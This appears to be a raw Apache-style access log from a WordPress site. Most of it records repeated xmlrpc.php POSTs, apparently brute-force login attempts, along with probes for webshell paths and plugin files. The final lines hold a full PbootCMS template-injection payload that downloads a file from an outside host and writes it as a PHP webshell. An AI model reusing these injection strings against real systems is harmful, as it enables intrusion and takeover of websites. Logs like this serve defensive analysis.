107.151.208.4 - - [27/May/2025:21:40:24 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:26 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:29 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:31 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:34 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:36 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:39 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:42 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:44 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:46 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:49 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:51 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:54 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:56 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:40:59 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:01 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:04 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:06 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:09 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:11 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:14 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.79.238.235 - - [27/May/2025:21:41:17 +0000] "POST /wp-cron.php?doing_wp_cron=1748382077.5623240470886230468750 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
107.151.208.4 - - [27/May/2025:21:41:16 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:19 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:21 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:24 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:26 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:29 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:32 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:34 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:37 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:39 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:42 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:44 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:47 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:49 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:52 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:54 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:57 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:41:59 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:02 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:04 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:07 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:09 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:12 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:14 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:16 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:20 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:22 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:24 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:27 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:30 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:32 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:35 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:36 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:39 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:41 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:44 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:46 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:49 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:51 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:54 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:56 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:42:59 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:01 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:04 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:06 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:09 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:11 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:14 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:16 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:19 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:22 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:24 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:27 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:29 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.79.238.235 - - [27/May/2025:21:43:32 +0000] "POST /wp-cron.php?doing_wp_cron=1748382212.6913220882415771484375 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
107.151.208.4 - - [27/May/2025:21:43:32 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:34 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:37 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:39 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:42 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:44 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:47 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:49 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:52 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:54 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:43:57 +0000] "POST //xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
107.151.208.4 - - [27/May/2025:21:44:34 +0000] "POST //xmlrpc.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.79.238.235 - - [27/May/2025:21:44:56 +0000] "POST /wp-cron.php?doing_wp_cron=1748382296.2060270309448242187500 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
172.69.60.177 - - [27/May/2025:21:44:54 +0000] "GET / HTTP/2.0" 301 20 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.238.235 - - [27/May/2025:21:56:59 +0000] "POST /wp-cron.php?doing_wp_cron=1748383019.8769500255584716796875 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
57.155.66.151 - - [27/May/2025:21:56:58 +0000] "GET /wp-content/themes/hello_dolly_v2.php HTTP/1.1" 404 43554 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
57.155.66.151 - - [27/May/2025:21:57:08 +0000] "GET /wp-content/themes/hello_dolly_v2.php HTTP/1.1" 404 43554 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
57.155.66.151 - - [27/May/2025:21:57:29 +0000] "GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.1" 404 43554 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
57.155.66.151 - - [27/May/2025:21:57:42 +0000] "GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.1" 404 43554 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.79.238.235 - - [27/May/2025:22:17:49 +0000] "POST /wp-cron.php?doing_wp_cron=1748384269.4423298835754394531250 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
134.17.14.12 - - [27/May/2025:22:17:48 +0000] "GET /wp-content/plugins/masterstudy-lms-learning-management-system-pro/readme.txt HTTP/1.1" 404 43577 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
45.79.238.235 - - [27/May/2025:22:31:54 +0000] "POST /wp-cron.php?doing_wp_cron=1748385114.2208290100097656250000 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
111.68.1.2 - - [27/May/2025:22:31:53 +0000] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(//t))//(get/*-*/(//t1),get/*-*/(//t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:31:54 +0000] "GET /?tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(//t))//(get/*-*/(//t1),get/*-*/(//t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:31:55 +0000] "GET /runtime/cache/odin123.php HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:32:38 +0000] "GET /?tag&tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:32:39 +0000] "GET /?tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:32:40 +0000] "GET /runtime/cache/odin123.php HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
45.79.238.235 - - [27/May/2025:22:35:07 +0000] "POST /wp-cron.php?doing_wp_cron=1748385307.6743450164794921875000 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
111.68.1.2 - - [27/May/2025:22:35:07 +0000] "GET /?tag&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&tagstpl=news.html&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
